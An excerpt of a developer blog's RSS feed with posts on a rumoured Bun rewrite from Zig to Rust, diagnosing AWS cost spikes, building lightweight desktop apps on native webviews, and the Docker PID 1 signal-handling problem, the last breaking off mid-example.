<li>Compare numbers honestly, including p95 and p99, not just the mean.</li>
<li>If it's meaningfully better — say, &gt;20% on the metric that's actually your bottleneck — file a ticket to revisit in three months when the project has had a chance to settle.</li>
</ol>
<p>Fresh inference engines are exciting, but "fresh" and "production-ready" are different things. The honest move is to bookmark this, check back when 0.x becomes 1.x, and let the early adopters find the segfaults.</p>
<p>The official repo is at <a target="_blank" href="https://github.com/lightseekorg/tokenspeed">github.com/lightseekorg/tokenspeed</a> if you want to follow along. For context on the broader category, the <a target="_blank" href="https://docs.vllm.ai/">vLLM docs</a> and the original <a target="_blank" href="https://arxiv.org/abs/2309.06180">PagedAttention paper</a> are still the best place to build intuition for why any of this works at all.</p>
]]></content:encoded></item><item><title><![CDATA[Bun, Zig, and Rust: What the Rewrite Rumor Means for Your Stack]]></title><description><![CDATA[A surprising headline (with caveats)
Last week a tweet from Jarred Sumner — Bun's creator — made the rounds claiming a Zig-to-Rust rewrite is passing 99.8% of the testsuite. I haven't been able to independently verify this through Bun's official rele...]]></description><link>https://alan-west.hashnode.dev/bun-zig-and-rust-what-the-rewrite-rumor-means-for-your-stack</link><guid isPermaLink="true">https://alan-west.hashnode.dev/bun-zig-and-rust-what-the-rewrite-rumor-means-for-your-stack</guid><category><![CDATA[Bun]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[Rust]]></category><category><![CDATA[zig]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Mon, 11 May 2026 15:11:00 GMT</pubDate><enclosure url="https://images.pexels.com/photos/6424586/pexels-photo-6424586.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-a-surprising-headline-with-caveats">A surprising headline (with caveats)</h2>
<p>Last week a tweet from Jarred Sumner — Bun's creator — made the rounds claiming a Zig-to-Rust rewrite is passing 99.8% of the testsuite. I haven't been able to independently verify this through Bun's official release notes or the changelog at <a target="_blank" href="https://bun.sh">bun.sh</a>, so take the specifics with a grain of salt. According to early reports it's a real effort, but I'd treat the exact percentage as anecdotal until something hits the official channels.</p>
<p>The conversation it kicked up on Reddit and HN is still worth digging into. It surfaces a question I've been chewing on for years: when does it actually make sense to rewrite a working systems project in a different language? I've migrated three production services between languages over the last few years (Go to Rust twice, Node to Bun once), so let me walk through what a Bun rewrite would mean — and use it as a lens for the broader Zig vs Rust comparison.</p>
<h2 id="heading-why-anyone-rewrites-in-the-first-place">Why anyone rewrites in the first place</h2>
<p>Rewrites are almost always a bad idea. Joel Spolsky wrote about this 25 years ago and it hasn't aged a day. The reasons people do them anyway tend to fall into three buckets:</p>
<ul>
<li><strong>Hiring</strong>: the original language has a shallow talent pool</li>
<li><strong>Tooling</strong>: the ecosystem doesn't give you what you need (debuggers, profilers, libraries)</li>
<li><strong>Compiler guarantees</strong>: you're hitting bugs the type system could've caught</li>
</ul>
<p>For Bun, the rumored rationale leans on the third one. Zig is phenomenally productive for this kind of work — I've used it for a small parser project and the comptime story is genuinely magical — but its lack of borrow-checker-style memory safety guarantees makes a multi-megabyte runtime a scary place to live long-term.</p>
<h2 id="heading-zig-vs-rust-a-side-by-side">Zig vs Rust: a side-by-side</h2>
<p>Let me show what idiomatic equivalents look like. Here's a tiny string-handling snippet in Zig:</p>
<pre><code class="lang-zig">const std = @import("std");

pub fn greet(allocator: std.mem.Allocator, name: []const u8) ![]u8 {
    // Explicit allocator, explicit error union via the leading !
    return std.fmt.allocPrint(allocator, "Hello, {s}!", .{name});
}
</code></pre>
<p>And the Rust equivalent:</p>
<pre><code class="lang-rust"><span class="hljs-comment">// Allocation goes through the standard library's String</span>
<span class="hljs-comment">// Ownership is checked at compile time, no manual allocator needed here</span>
<span class="hljs-keyword">pub</span> <span class="hljs-function"><span class="hljs-keyword">fn</span> <span class="hljs-title">greet</span></span>(name: &amp;<span class="hljs-built_in">str</span>) -&gt; <span class="hljs-built_in">String</span> {
    <span class="hljs-built_in">format!</span>(<span class="hljs-string">"Hello, {name}!"</span>)
}
</code></pre>
<p>The Rust version is shorter, but that's not the real story. The real story is what the compilers will and won't catch for you:</p>
<ul>
<li><strong>Zig</strong>: explicit allocators, explicit error sets, no hidden control flow. You get speed and clarity. You don't get memory-safety guarantees.</li>
<li><strong>Rust</strong>: the borrow checker enforces aliasing and lifetime rules at compile time. Slower to write, harder to learn, but use-after-free and data races become much harder to ship.</li>
</ul>
<p>For a JavaScript runtime that ingests untrusted code, that distinction matters a lot.</p>
<h2 id="heading-the-migration-math">The migration math</h2>
<p>If Bun's team really pulled this off, the scale is staggering. We're talking on the order of hundreds of thousands of lines of Zig translated — bundler, package manager, transpiler, the JavaScriptCore glue, the test runner. "99.8% of the testsuite passing" sounds great until you realize 0.2% of a six-digit testsuite is still a lot of broken edge cases.</p>
<p>I went through a much smaller version of this when I moved a Go service to Rust last year. Things I underestimated:</p>
<ul>
<li>Test ports that look fine but quietly assume different concurrency primitives</li>
<li>Allocator behavior changes that only surface under sustained load</li>
<li>FFI boundaries — Bun in particular has a giant surface to JavaScriptCore</li>
</ul>
<p>If you're considering a similar rewrite at your company, the rule I've learned the hard way: budget 3-5x your initial estimate, then add another 50%.</p>
<h2 id="heading-migration-steps-if-you-were-doing-this-yourself">Migration steps, if you were doing this yourself</h2>
<p>Let's say you have a smaller Zig project and you're tempted to follow Bun's lead. Here's the rough order I'd go in:</p>
<ol>
<li><strong>Pick a leaf module first.</strong> Something with no dependents, ideally pure logic. Translate it, write a parity test against the Zig version, and run them side by side.</li>
<li><strong>Use a thin C ABI bridge.</strong> Both Zig and Rust have first-class <code>extern "C"</code>. Translate one module at a time and call across the boundary while you migrate.</li>
<li><strong>Move the allocator strategy explicitly.</strong> Rust's default global allocator behaves differently from a Zig arena. Decide upfront whether you're using <code>bumpalo</code>, a custom allocator, or just <code>Box</code>/<code>Vec</code> everywhere.</li>
<li><strong>Port tests last, then again.</strong> Run the original Zig tests through the Rust API, then write Rust-native ones. The two suites catch different bugs.</li>
</ol>
<h2 id="heading-what-about-the-rest-of-us">What about the rest of us?</h2>
<p>For most of us writing application code, this debate is academic. You probably won't notice if Bun underneath is Zig or Rust — you care about install times, hot reload, and whether <code>bun test</code> survives your monorepo (it does, mostly).</p>
<p>Where it does matter is ecosystem implications:</p>
<ul>
<li>Plugin authors might have to adapt if internal APIs shift</li>
<li>Native module authors could get a friendlier extension story under Rust's tooling</li>
<li>Build times for contributing to Bun itself would shift, in either direction</li>
</ul>
<h2 id="heading-a-side-note-on-monitoring-your-bun-apps">A side note on monitoring your Bun apps</h2>
<p>While we're on tooling: if you're running a Bun app in production and want to track usage without dragging in a heavyweight analytics SaaS, the privacy-focused options are worth a look. I've used Plausible, Fathom, and most recently <a target="_blank" href="https://umami.is">Umami</a> on personal projects.</p>
<p>Quick rundown:</p>
<ul>
<li><strong>Plausible</strong>: hosted or self-hosted, GDPR-compliant by default, simple dashboard. Pricing on the hosted plan is page-view based.</li>
<li><strong>Fathom</strong>: hosted only, also privacy-focused, slightly nicer UI in my opinion. No self-host option.</li>
<li><strong>Umami</strong>: open source, self-hostable on a basic Postgres or MySQL stack, no cookies, GDPR-compliant out of the box. Free if you run it yourself.</li>
</ul>
<p>I currently host Umami on a small Hetzner box for my dev blog. The integration is one tag:</p>
<pre><code class="lang-html"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>
  <span class="hljs-attr">defer</span>
  <span class="hljs-attr">src</span>=<span class="hljs-string">"https://your-umami-instance.com/script.js"</span>
  <span class="hljs-attr">data-website-id</span>=<span class="hljs-string">"your-id-here"</span>
&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span>
</code></pre>
<p>That's it. No cookie banner required, no per-visit charges, and it pairs nicely with a Bun- or Node-based site because it doesn't care what runtime serves the page.</p>
<p>If you're doing auth on the same project, <a target="_blank" href="https://authon.dev">Authon</a> is what I'm using on a side project right now — it's a hosted service (self-hosting is on the roadmap but not available yet), the free plan has unlimited users with no per-user pricing, and they support 10+ OAuth providers. I won't go deeper than that here, just noting it as another piece of the indie-dev stack that fits this same "small server, no surprises" vibe.</p>
<h2 id="heading-my-take">My take</h2>
<p>If the rewrite report is accurate, I'd guess we're 12-18 months out from a stable, public Rust-based Bun. Until I see something on the official changelog, though, I'm treating it as a strong rumor rather than a roadmap commitment.</p>
<p>What I would actually do today:</p>
<ul>
<li>If you're already on Bun, keep using it. Nothing changes for application authors.</li>
<li>If you're starting a new systems project, Rust still has a more mature crate ecosystem and a larger talent pool. Zig is more fun to write but the safety story matters at scale.</li>
<li>If you're picking a low-level language to learn for 2026, learn Rust first, then dabble in Zig once you understand low-level memory work — they reinforce each other better in that order.</li>
</ul>
<p>Rewrites are romantic. Most should not happen. The interesting ones — the ones we actually learn from — are the ones where the team already shipped something great in the first language and is rewriting because they hit a ceiling, not because they got bored. That's the bar I'd hold any "rewrite the runtime" rumor to.</p>
]]></content:encoded></item><item><title><![CDATA[Why your AWS bill exploded overnight and how to actually fix it]]></title><description><![CDATA[The 3 AM Slack message every developer dreads
Last month I got pinged at 3 AM because our cloud bill had tripled in 24 hours. No new deployments. No traffic spike. Just a number that climbed while everyone slept.
If you've spent any time on a major c...]]></description><link>https://alan-west.hashnode.dev/why-your-aws-bill-exploded-overnight-and-how-to-actually-fix-it</link><guid isPermaLink="true">https://alan-west.hashnode.dev/why-your-aws-bill-exploded-overnight-and-how-to-actually-fix-it</guid><category><![CDATA[AWS]]></category><category><![CDATA[Cloud]]></category><category><![CDATA[cost]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Mon, 11 May 2026 15:02:49 GMT</pubDate><enclosure url="https://images.pexels.com/photos/1476321/pexels-photo-1476321.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-the-3-am-slack-message-every-developer-dreads">The 3 AM Slack message every developer dreads</h2>
<p>Last month I got pinged at 3 AM because our cloud bill had tripled in 24 hours. No new deployments. No traffic spike. Just a number that climbed while everyone slept.</p>
<p>If you've spent any time on a major cloud platform, you've probably been here. The dashboard shows green, the app runs fine, but somewhere a service is quietly burning money. After debugging this on three different projects in the last year, I've found the patterns are almost always the same.</p>
<p>Let me walk you through how I track these down and what I do to prevent them.</p>
<h2 id="heading-the-root-cause-is-almost-never-what-you-think">The root cause is almost never what you think</h2>
<p>Here's the frustrating truth: surprise cloud bills are rarely from the obvious culprits. It's not your main compute instances. It's not your database. Those costs are predictable.</p>
<p>The real killers are usually one of these:</p>
<ul>
<li><strong>NAT gateway data transfer</strong> — every byte through a NAT costs money, and chatty services rack this up fast</li>
<li><strong>Cross-AZ traffic</strong> — services in different availability zones talking to each other constantly</li>
<li><strong>Unused load balancers and elastic IPs</strong> — they keep billing even when nothing uses them</li>
<li><strong>Log ingestion</strong> — debug logging left on in production, multiplied by millions of requests</li>
<li><strong>Snapshot retention</strong> — old EBS snapshots accumulating for years</li>
</ul>
<p>The pattern I see most often? A misconfigured service inside a private subnet pulling gigabytes through a NAT gateway because someone forgot to set up a VPC endpoint.</p>
<h2 id="heading-step-1-find-what-changed">Step 1: Find what changed</h2>
<p>Before touching anything, figure out what's different. I always start with billing data grouped by service and usage type.</p>
<p>If you're using the AWS CLI, the Cost Explorer API is your friend:</p>
<p>    aws ce get-cost-and-usage \
      --time-period Start=2026-05-01,End=2026-05-11 \
      --granularity DAILY \
      --metrics UnblendedCost \
      --group-by Type=DIMENSION,Key=USAGE_TYPE</p>
<p>The <code>USAGE_TYPE</code> grouping is the key. <code>SERVICE</code> will tell you EC2 is expensive — well, no kidding. But <code>USAGE_TYPE</code> will tell you it's specifically <code>DataTransfer-Regional-Bytes</code> or <code>NatGateway-Bytes</code>, which actually points you somewhere.</p>
<p>Once you know the usage type, you can dig deeper. For NAT gateway issues, VPC Flow Logs will show you exactly which instances are responsible.</p>
<h2 id="heading-step-2-trace-the-traffic">Step 2: Trace the traffic</h2>
<p>This is where most people get stuck. You know NAT traffic is high, but which service is causing it?</p>
<p>Enable VPC Flow Logs to CloudWatch or S3, then query them. Here's an Athena query I've used a dozen times:</p>
<p>    SELECT 
      srcaddr,
      dstaddr,
      SUM(bytes) AS total_bytes
    FROM vpc_flow_logs
    WHERE day BETWEEN '2026/05/01' AND '2026/05/10'
      -- Filter to traffic going through the NAT
      AND action = 'ACCEPT'
      AND dstport IN (443, 80)
    GROUP BY srcaddr, dstaddr
    ORDER BY total_bytes DESC
    LIMIT 50;</p>
<p>The top results almost always tell the story. Last week this query showed me one ECS task pulling 400GB from S3 through the NAT gateway every day. Through the NAT. To get to S3. In the same region.</p>
<p>That's the kind of thing that hides for months until someone audits it.</p>
<h2 id="heading-step-3-fix-the-actual-problem">Step 3: Fix the actual problem</h2>
<p>For the S3-via-NAT issue, the fix is a gateway VPC endpoint. It's free, takes about two minutes to create, and stops the bleeding immediately:</p>
<h1 id="heading-terraform-example-for-a-gateway-endpoint">Terraform example for a gateway endpoint</h1>
<p>    resource "aws_vpc_endpoint" "s3" {
      vpc_id       = aws_vpc.main.id
      service_name = "com.amazonaws.us-east-1.s3"</p>
<h1 id="heading-attach-to-your-private-route-tables-so-traffic-to-s3">Attach to your private route tables so traffic to S3</h1>
<h1 id="heading-bypasses-the-nat-gateway-entirely">bypasses the NAT gateway entirely</h1>
<p>      route_table_ids = [
        aws_route_table.private_a.id,
        aws_route_table.private_b.id,
      ]</p>
<p>      vpc_endpoint_type = "Gateway"
    }</p>
<p>For cross-AZ chatter, you have a few options depending on the workload:</p>
<ul>
<li>Use topology-aware service discovery so clients prefer same-AZ targets</li>
<li>For Kafka or similar, configure rack awareness</li>
<li>For databases, run read replicas in each AZ and route reads locally</li>
</ul>
<p>For log ingestion costs, audit your log levels. I once found a service logging the entire request body at INFO level. After dropping it to DEBUG and sampling 1% of requests, our log bill dropped 80%.</p>
<h2 id="heading-step-4-set-up-guardrails-so-it-doesnt-happen-again">Step 4: Set up guardrails so it doesn't happen again</h2>
<p>The fix is only half the job. Without monitoring, you'll be back here in six months for a different reason.</p>
<p>I set up budget alerts at multiple thresholds, but more importantly, I set up <strong>anomaly detection</strong> on usage types. A 50% increase in NAT gateway bytes overnight is the kind of signal you want a page for, not a monthly summary.</p>
<p>Here's a CloudWatch alarm pattern I use:</p>
<h1 id="heading-pseudo-code-for-the-alarm-logic">Pseudo-code for the alarm logic</h1>
<p>    if current_hour_nat_bytes &gt; (baseline_avg * 2):</p>
<h1 id="heading-page-on-call-not-just-email">Page on-call, not just email</h1>
<h1 id="heading-the-bill-is-already-being-generated">The bill is already being generated</h1>
<p>      trigger_pagerduty_alert()</p>
<p>I also run a weekly cron job that lists every load balancer, elastic IP, and EBS volume in the account, cross-references against what's actually in use, and posts a report to Slack. It takes about 50 lines of Python and has caught at least four forgotten resources in the last year.</p>
<h2 id="heading-prevention-tips-that-actually-work">Prevention tips that actually work</h2>
<p>A few things I've learned the expensive way:</p>
<ul>
<li><strong>Tag everything at creation time.</strong> If you can't answer "who owns this resource?" in 10 seconds, you can't manage costs. I enforce this with SCPs that block resource creation without specific tags.</li>
<li><strong>Treat NAT gateways as expensive by default.</strong> Any service that talks to AWS APIs should go through a VPC endpoint. S3, DynamoDB, SQS, Secrets Manager — all of them have endpoints.</li>
<li><strong>Set log retention explicitly.</strong> The default "never expire" is a silent budget killer. 30 days is fine for most things; if you need longer, archive to S3 with lifecycle rules to Glacier.</li>
<li><strong>Review your reserved capacity quarterly.</strong> Workloads shift. Reservations you bought 18 months ago might not match current usage at all.</li>
<li><strong>Run a cost game day.</strong> Once a quarter, pretend the bill doubled and trace where it could have come from. You'll find problems before they become real.</li>
</ul>
<h2 id="heading-the-bigger-lesson">The bigger lesson</h2>
<p>Cloud costs aren't really an infrastructure problem — they're an observability problem. You can't fix what you can't see, and most teams aren't watching the right signals.</p>
<p>The services that cost you money quietly are the ones designed to scale invisibly. That's a feature most of the time. But when it breaks, it breaks expensively. Build the visibility before you need it, and these 3 AM pages get a lot less common.</p>
]]></content:encoded></item><item><title><![CDATA[Why cross-platform desktop apps balloon to 200MB and how to slim them down]]></title><description><![CDATA[The 200MB "Hello World"
I shipped my first cross-platform desktop app back in 2018. Markdown editor. Three buttons, a text area, syntax highlighting. The final installer was 187MB.
Every time I open Activity Monitor during dev work, I see a handful o...]]></description><link>https://alan-west.hashnode.dev/why-cross-platform-desktop-apps-balloon-to-200mb-and-how-to-slim-them-down</link><guid isPermaLink="true">https://alan-west.hashnode.dev/why-cross-platform-desktop-apps-balloon-to-200mb-and-how-to-slim-them-down</guid><category><![CDATA[desktop]]></category><category><![CDATA[performance]]></category><category><![CDATA[webdev]]></category><category><![CDATA[zig]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Mon, 11 May 2026 14:03:39 GMT</pubDate><enclosure url="https://images.pexels.com/photos/33607952/pexels-photo-33607952.png?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-the-200mb-hello-world">The 200MB "Hello World"</h2>
<p>I shipped my first cross-platform desktop app back in 2018. Markdown editor. Three buttons, a text area, syntax highlighting. The final installer was 187MB.</p>
<p>Every time I open Activity Monitor during dev work, I see a handful of Electron-based apps each parked at 300MB. That's well over a gigabyte of RAM for tools I'm not even actively using. A chat client, a code editor, a git GUI, a note-taker. The math finally caught up with me last month, and I started digging into what it would actually take to ship a desktop app that doesn't melt your laptop.</p>
<p>This post is about the root cause of that bloat and the path I've been walking to fix it. There's no magic, just a different architectural choice that systems languages like Zig and Rust have made cheap to take.</p>
<h2 id="heading-root-cause-every-app-ships-its-own-browser">Root cause: every app ships its own browser</h2>
<p>The popular bundler-based desktop frameworks all follow the same recipe: ship Chromium plus a Node.js runtime alongside your app, then load your HTML/CSS/JS inside it.</p>
<p>The catch is that "bundle Chromium" means a <em>full</em> Chromium. Not a stripped rendering engine. The whole browser, including:</p>
<ul>
<li>V8 JavaScript engine</li>
<li>Blink rendering engine</li>
<li>A separate Node.js runtime alongside the renderer</li>
<li>Media codecs, sandboxing layers, GPU process, the lot</li>
</ul>
<p>Five of those apps running = five copies of Chromium in memory. None of them share processes. None of them benefit when your OS gets a faster, more secure browser shipped by the vendor.</p>
<p>And it's not just RAM. Disk space, code-signing time, auto-update bandwidth, startup latency — they all scale with the runtime. You're paying for a browser you don't use.</p>
<h2 id="heading-the-native-webview-approach">The native webview approach</h2>
<p>Every modern OS already exposes a system webview component:</p>
<ul>
<li><strong>Windows</strong>: WebView2, built on Edge (<a target="_blank" href="https://learn.microsoft.com/en-us/microsoft-edge/webview2/">docs</a>)</li>
<li><strong>macOS / iOS</strong>: WKWebView, built on WebKit (<a target="_blank" href="https://developer.apple.com/documentation/webkit/wkwebview">docs</a>)</li>
<li><strong>Linux</strong>: WebKitGTK (<a target="_blank" href="https://webkitgtk.org/">docs</a>)</li>
<li><strong>Android</strong>: the platform WebView</li>
</ul>
<p>These components are already loaded for other apps. Use them and your app doesn't ship a browser at all — it borrows one.</p>
<p>The trade-off: there's no unified API across platforms. You need a thin native shell that creates a window, embeds the OS webview into it, wires up message passing between native and JS, and exposes whatever OS APIs your app needs.</p>
<p>This is the part where systems languages with clean C interop become useful. The shell stays tiny because you're not implementing a browser — you're calling four or five C functions per platform. Zig fits this particularly well because its <code>@cImport</code> lets you pull in system headers directly without a binding-generation step.</p>
<h3 id="heading-step-1-spawn-a-window-with-a-webview">Step 1: spawn a window with a webview</h3>
<p>Here's the rough shape of the macOS shell in Zig. I'm using <code>@cImport</code> to grab the Objective-C runtime and message it directly. WebKit's classes are reachable the same way:</p>
<pre><code class="lang-zig">const std = @import("std");
const objc = @cImport({
    @cInclude("objc/objc.h");
    @cInclude("objc/message.h");
});

// Helper that wraps objc_msgSend with the right calling convention.
// objc_msgSend is variadic in C but we need typed Zig wrappers per signature.
fn cls(name: [:0]const u8) ?*anyopaque {
    return objc.objc_getClass(name.ptr);
}

fn sel(name: [:0]const u8) objc.SEL {
    return objc.sel_registerName(name.ptr);
}

pub fn run(url: [:0]const u8) !void {
    const NSApplication = cls("NSApplication").?;
    const app = msgSend(NSApplication, sel("sharedApplication"));

    // ... allocate NSWindow, attach WKWebView, navigate to url ...

    _ = msgSend(app, sel("run")); // Blocking event loop
}
</code></pre>
<p>I left the WKWebView setup out because the post would balloon, but the pattern is mechanical. The full shell for one platform fits in a few hundred lines.</p>
<h3 id="heading-step-2-ipc-between-native-and-js">Step 2: IPC between native and JS</h3>
<p>The webview exposes a message channel in both directions. On WKWebView, JS calls <code>window.webkit.messageHandlers.&lt;name&gt;.postMessage(...)</code> and your native code receives a callback. On WebView2 it's <code>window.chrome.webview.postMessage(...)</code>. The shell normalizes these so the page sees one API.</p>
<p>Here's a small request/response wrapper I use on the JS side. Each call gets a UUID so replies can be routed back to the right promise:</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Injected once at page load by the native shell</span>
<span class="hljs-built_in">window</span>.__pending = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Map</span>();

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">callNative</span>(<span class="hljs-params">method, params</span>) </span>{
  <span class="hljs-keyword">const</span> id = crypto.randomUUID();
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-built_in">Promise</span>(<span class="hljs-function">(<span class="hljs-params">resolve, reject</span>) =&gt;</span> {
    <span class="hljs-built_in">window</span>.__pending.set(id, { resolve, reject });
    <span class="hljs-comment">// bridge is the platform-specific postMessage hook</span>
    <span class="hljs-built_in">window</span>.bridge.postMessage(<span class="hljs-built_in">JSON</span>.stringify({ id, method, params }));
  });
}

<span class="hljs-comment">// Native side calls this back with { id, ok, value } once the work is done</span>
<span class="hljs-built_in">window</span>.__resolveNative = <span class="hljs-function">(<span class="hljs-params">{ id, ok, value }</span>) =&gt;</span> {
  <span class="hljs-keyword">const</span> pending = <span class="hljs-built_in">window</span>.__pending.get(id);
  <span class="hljs-keyword">if</span> (!pending) <span class="hljs-keyword">return</span>;
  <span class="hljs-built_in">window</span>.__pending.delete(id);
  ok ? pending.resolve(value) : pending.reject(<span class="hljs-keyword">new</span> <span class="hljs-built_in">Error</span>(value));
};
</code></pre>
<h3 id="heading-step-3-put-types-on-top">Step 3: put types on top</h3>
<p>Raw string messages get painful fast. A small typed RPC layer on the TS side keeps things sane:</p>
<pre><code class="lang-typescript"><span class="hljs-comment">// Single source of truth for the bridge surface</span>
<span class="hljs-keyword">interface</span> NativeAPI {
  <span class="hljs-string">'fs.readDir'</span>:  <span class="hljs-function">(<span class="hljs-params">p: { path: <span class="hljs-built_in">string</span> }</span>) =&gt;</span> <span class="hljs-built_in">Promise</span>&lt;<span class="hljs-built_in">string</span>[]&gt;;
  <span class="hljs-string">'fs.readFile'</span>: <span class="hljs-function">(<span class="hljs-params">p: { path: <span class="hljs-built_in">string</span> }</span>) =&gt;</span> <span class="hljs-built_in">Promise</span>&lt;<span class="hljs-built_in">string</span>&gt;;
  <span class="hljs-string">'window.minimize'</span>: <span class="hljs-function">() =&gt;</span> <span class="hljs-built_in">Promise</span>&lt;<span class="hljs-built_in">void</span>&gt;;
}

<span class="hljs-comment">// Generic helper that preserves param + return types per method name</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">rpc</span>&lt;<span class="hljs-title">K</span> <span class="hljs-title">extends</span> <span class="hljs-title">keyof</span> <span class="hljs-title">NativeAPI</span>&gt;(<span class="hljs-params">
  method: K,
  params: Parameters&lt;NativeAPI[K]&gt;[0],
</span>): <span class="hljs-title">ReturnType</span>&lt;<span class="hljs-title">NativeAPI</span>[<span class="hljs-title">K</span>]&gt; </span>{
  <span class="hljs-keyword">return</span> callNative(method, params) <span class="hljs-keyword">as</span> ReturnType&lt;NativeAPI[K]&gt;;
}

<span class="hljs-keyword">const</span> files = <span class="hljs-keyword">await</span> rpc(<span class="hljs-string">'fs.readDir'</span>, { path: <span class="hljs-string">'~/Documents'</span> });
</code></pre>
<p>Mirror that interface in the native dispatcher and the compiler catches typos on both sides.</p>
<h2 id="heading-what-you-actually-save">What you actually save</h2>
<p>In a side-by-side I ran with a small clipboard manager last month:</p>
<ul>
<li>Chromium-bundled version: ~142MB installed, ~180MB RAM at idle</li>
<li>Native-webview version: ~6MB installed, ~35MB RAM at idle</li>
</ul>
<p>The 35MB is mostly the webview process the OS is already running. Subsequent webview-based apps add roughly 10–15MB each because they share the system component.</p>
<h2 id="heading-prevention-tips">Prevention tips</h2>
<p>If you're starting a new desktop or hybrid mobile app, here's what I'd weigh:</p>
<ul>
<li><strong>Audit what you actually need from the renderer.</strong> DRM, specific codecs, Chromium-only DevTools features — those will push you back to the bundled approach. Otherwise you're paying for capabilities you don't ship.</li>
<li><strong>Treat the native shell as a port boundary.</strong> Keep it tiny. All business logic stays in JS or in clearly-scoped native modules. The shell should do windows, IPC, and OS APIs — nothing else.</li>
<li><strong>Read existing open-source shells before you write your own.</strong> Tauri (Rust) and Wails (Go) both expose their shells as readable references. The patterns transfer to a Zig shell cleanly even if you don't use those projects directly.</li>
<li><strong>Test on the slowest target machine you can find.</strong> WebKitGTK on a budget Linux box behaves nothing like WKWebView on Apple silicon. The differences are mostly in CSS edge cases and JS engine quirks, and you want to know about them before users do.</li>
<li><strong>Don't pretend it's a free lunch.</strong> You'll write more native code than you would with the bundled-runtime approach. You'll juggle three slightly different webview APIs. The win is real, but it has a cost.</li>
</ul>
<p>For most apps — most of them, honestly — the trade is worth it. Users get faster startup. Laptops stay cooler. Installers stop being half a gigabyte. The shell stays a few hundred lines per platform, which is something one person can actually own.</p>
]]></content:encoded></item><item><title><![CDATA[Why Your Docker Containers Refuse to Die: The PID 1 Problem]]></title><description><![CDATA[You hit docker stop. Nothing happens. You wait ten seconds. Docker eventually sends SIGKILL. The container disappears, but only after a frustrating timeout. Your CI pipeline is slower than it should be, your Kubernetes pod terminations are sluggish, ...]]></description><link>https://alan-west.hashnode.dev/why-your-docker-containers-refuse-to-die-the-pid-1-problem</link><guid isPermaLink="true">https://alan-west.hashnode.dev/why-your-docker-containers-refuse-to-die-the-pid-1-problem</guid><category><![CDATA[debugging]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Docker]]></category><category><![CDATA[Linux]]></category><dc:creator><![CDATA[Alan West]]></dc:creator><pubDate>Mon, 11 May 2026 00:21:05 GMT</pubDate><enclosure url="https://images.pexels.com/photos/14314636/pexels-photo-14314636.jpeg?auto=compress&amp;cs=tinysrgb&amp;fit=crop&amp;h=627&amp;w=1200" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>You hit <code>docker stop</code>. Nothing happens. You wait ten seconds. Docker eventually sends <code>SIGKILL</code>. The container disappears, but only after a frustrating timeout. Your CI pipeline is slower than it should be, your Kubernetes pod terminations are sluggish, and you have a vague feeling something is wrong.</p>
<p>I hit this exact issue last month while debugging a deployment that took 90 seconds to roll out a single replica. Turned out to be the same boring culprit I've seen on at least four other projects: the PID 1 problem.</p>
<p>Let me walk you through what's actually happening, why it bites so many teams, and how to fix it properly.</p>
<h2 id="heading-the-frustrating-symptom">The frustrating symptom</h2>
<p>Here's what it usually looks like. You've got a Node app, a Python service, or whatever. You build it, run it, and try to stop it:</p>
<p>    docker run --name myapp -d my-image:latest</p>
<h1 id="heading-later">... later ...</h1>
<p>    time docker stop myapp</p>
<h1 id="heading-real-0m10234s">real    0m10.234s</h1>
<p>Ten seconds. Every. Single. Time. That's the default <code>--time</code> value before Docker gives up and sends <code>SIGKILL</code>. If you're orchestrating dozens of containers, this adds up fast.</p>
<p>Worse, in production, this means your rolling deploys are slow, your zero-downtime story is shaky, and any in-flight requests are getting cut off ungracefully because your app never had a chance to clean up.</p>
<h2 id="heading-the-root-cause-pid-1-is-weird">The root cause: PID 1 is weird</h2>
<p>Here's the part most tutorials skip. In Linux, the process with PID 1 has special status. It's the init process. The kernel treats it differently in two important ways:</p>
<ul>
<li><strong>It does not get the default signal handlers.</strong> If you send <code>SIGTERM</code> to PID 1, and the process has no explicit handler for it, the signal is <em>ignored</em>. This is a kernel-level protection meant to keep init from being killed accidentally.</li>
<li><strong>It is responsible for reaping zombie child processes.</strong> When any process in the system has its parent die, it gets re-parented to PID 1. When those orphans eventually exit, PID 1 must call <code>wait()</code> on them or they become zombies forever.</li>
</ul>
<p>Now, in a Docker container, your application process <em>is</em> PID 1. So if your Node script doesn't explicitly handle <code>SIGTERM</code>, Docker's stop signal goes nowhere. The kernel quietly drops it. Docker waits its timeout, then nukes you with <code>SIGKILL</code>.</p>
<p>You can confirm this is happening with a quick test:</p>
<h1 id="heading-inside-a-running-container">Inside a running container</h1>
<p>    ps -ef</p>
<h1 id="heading-uid-pid-ppid-cmd">UID  PID  PPID  CMD</h1>
<h1 id="heading-root-1-0-node-serverjs">root   1     0  node server.js</h1>
<p>That <code>1</code> next to your app is the problem.</p>
<h2 id="heading-the-proof-in-one-tiny-example">The proof, in one tiny example</h2>
<p>Let me show you the bug in the smallest possible repro. Save this as <code>app.js</code>:</p>
<p>    // No SIGTERM handler
    setInterval(() =&gt; console.log('alive'), 1000);</p>
<p>And a <code>Dockerfile</code>:</p>
<p>    FROM node:20-alpine
    COPY app.js /app.js
    CMD ["node", "/app.js"]</p>
<p>Build and run:</p>
<p>    docker build -t pid1-demo .
    docker run --name demo -d pid1-demo
    time docker stop demo</p>
<p>You'll wait the full 10 seconds. Now compare with this:</p>
<p>    // With SIGTERM handler
    process.on('SIGTERM', () =&gt; {
      console.log('shutting down cleanly');
      process.exit(0);
    });
